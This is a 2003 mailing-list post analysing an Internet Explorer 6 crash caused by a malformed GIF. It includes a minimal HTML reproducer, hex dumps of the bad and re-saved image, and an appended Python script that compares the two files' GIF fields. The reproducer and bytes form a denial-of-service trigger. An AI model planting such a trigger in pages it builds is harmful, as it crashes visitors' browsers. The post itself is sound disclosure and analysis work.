Full Disclosure mailing list archives
Re: New Microsoft Internet Explorer mshtml.dll Denial of Service?
From: Tim <tim-security () sentinelchicken org>
Date: Tue, 2 Sep 2003 10:38:07 -0700
Interesting...
After a **lot** of html code "trimming" I came up with an offline version of the page like this:
------------------------------------------------------
<html>
<body>
<table border="0" cellspacing="0" cellpadding="0">
<tr>
<td><img src="http://www.galad.com/frame/e1x1.gif" width="1" height="1" alt=""></td>
</tr>
</table>
</body>
</html>
-------------------------------------------------------
and this piece of code does crash my browser (6.0.2800.1106) on Windows 2000 Server, all patches and fixes up to date.

NOTE: Every time you **want** the browser to crash, you must delete it from the "Temporary Internet Files" before loading it in your browser.

Although this image (e1x1.gif) is a 1x1 GIF, ACDSee Classic calls it a "Bad or unrecognized image header". Does this image, in some way, affect the way IE does the parsing? Seems like it...
Yeah, the GIF image is almost certainly malformed. Not sure in what way yet, as I am no GIF expert. Some interesting information though:

Opening it in the GIMP produces the following errors on stderr:

GIF: too much input data, ignoring extra...
GIF: bogus character 0x00, ignoring

The file's contents are:

00000000  47 49 46 38 39 61 01 00 01 00 80 00 00 FF FF FF  GIF89a..........
00000010  FF FF FF 21 F9 04 01 00 00 01 00 2C 00 00 00 00  ...!.......,....
00000020  01 00 01 00 00 02 02 4C 01 00 3B                 .......L..;

I then opened the file in the GIMP, and immediately saved it back to another gif file, and it wrote:

00000000  47 49 46 38 39 61 01 00 01 00 80 00 00 FF FF FF  GIF89a..........
00000010  00 00 00 21 F9 04 01 00 00 00 00 2C 00 00 00 00  ...!.......,....
00000020  01 00 01 00 00 00 01 01 00 3B                    .........;

Which obviously has some differences. Anyone else better with GIF89a than I?

tim

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
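An added example, not part of the original post: a block-level walk of the two hex dumps above following the GIF89a layout (header, global colour table, graphic control extension, image descriptor, LZW data, trailer), reporting which parsed fields differ. The function and constant names are this example's own, and the byte strings are transcribed from the dumps as posted.

```python
import struct
# Bytes transcribed from the two hex dumps in the post above.
ORIGINAL = bytes.fromhex("47 49 46 38 39 61 01 00 01 00 80 00 00 FF FF FF"
                         "FF FF FF 21 F9 04 01 00 00 01 00 2C 00 00 00 00"
                         "01 00 01 00 00 02 02 4C 01 00 3B")
GIMP_RESAVE = bytes.fromhex("47 49 46 38 39 61 01 00 01 00 80 00 00 FF FF FF"
                            "00 00 00 21 F9 04 01 00 00 00 00 2C 00 00 00 00"
                            "01 00 01 00 00 00 01 01 00 3B")

def sub_blocks(buf, pos):
    """Join length-prefixed data sub-blocks up to the 0x00 terminator."""
    data = b""
    while buf[pos]:
        data += buf[pos + 1:pos + 1 + buf[pos]]
        pos += 1 + buf[pos]
    return data, pos + 1

def parse_gif(buf):
    """Walk one GIF; return (fields, bytes left over after the trailer)."""
    if buf[:6] not in (b"GIF87a", b"GIF89a"):
        raise ValueError("bad signature")
    try:
        f, pos = {"screen": struct.unpack_from("<HH", buf, 6)}, 13
        if buf[10] & 0x80:                          # global colour table present
            n = 2 << (buf[10] & 7)
            f["palette"] = [buf[pos + 3 * i:pos + 3 * i + 3].hex() for i in range(n)]
            pos += 3 * n
        while buf[pos] != 0x3B:                     # 0x3B is the trailer
            tag = buf[pos]
            if tag == 0x21:                         # extension block
                label, (data, pos) = buf[pos + 1], sub_blocks(buf, pos + 2)
                if label == 0xF9 and len(data) == 4:    # graphic control extension
                    f["transparent"] = (data[0] & 1, data[3])   # (flag, index)
            elif tag == 0x2C:                       # image descriptor
                f["image"] = struct.unpack_from("<HHHH", buf, pos + 1)
                pos += 10 + (3 * (2 << (buf[pos + 9] & 7)) if buf[pos + 9] & 0x80 else 0)
                f["lzw_min_code_size"] = buf[pos]
                data, pos = sub_blocks(buf, pos + 1)
                f["lzw_data"] = data.hex()
            else:
                raise ValueError(f"unknown block 0x{tag:02x} at offset {pos}")
        return f, buf[pos + 1:]
    except (IndexError, struct.error):
        raise ValueError("truncated file") from None

def diff_fields(a, b):
    """Parsed fields whose values differ between two GIF files."""
    fa, fb = parse_gif(a)[0], parse_gif(b)[0]
    return {k: (fa.get(k), fb.get(k)) for k in fa.keys() | fb.keys() if fa.get(k) != fb.get(k)}
```

Over the bytes as posted, both walks reach the trailer with nothing left over; `diff_fields(ORIGINAL, GIMP_RESAVE)` reports the second palette entry, the transparent colour index, the LZW minimum code size and the compressed image data as the fields that differ.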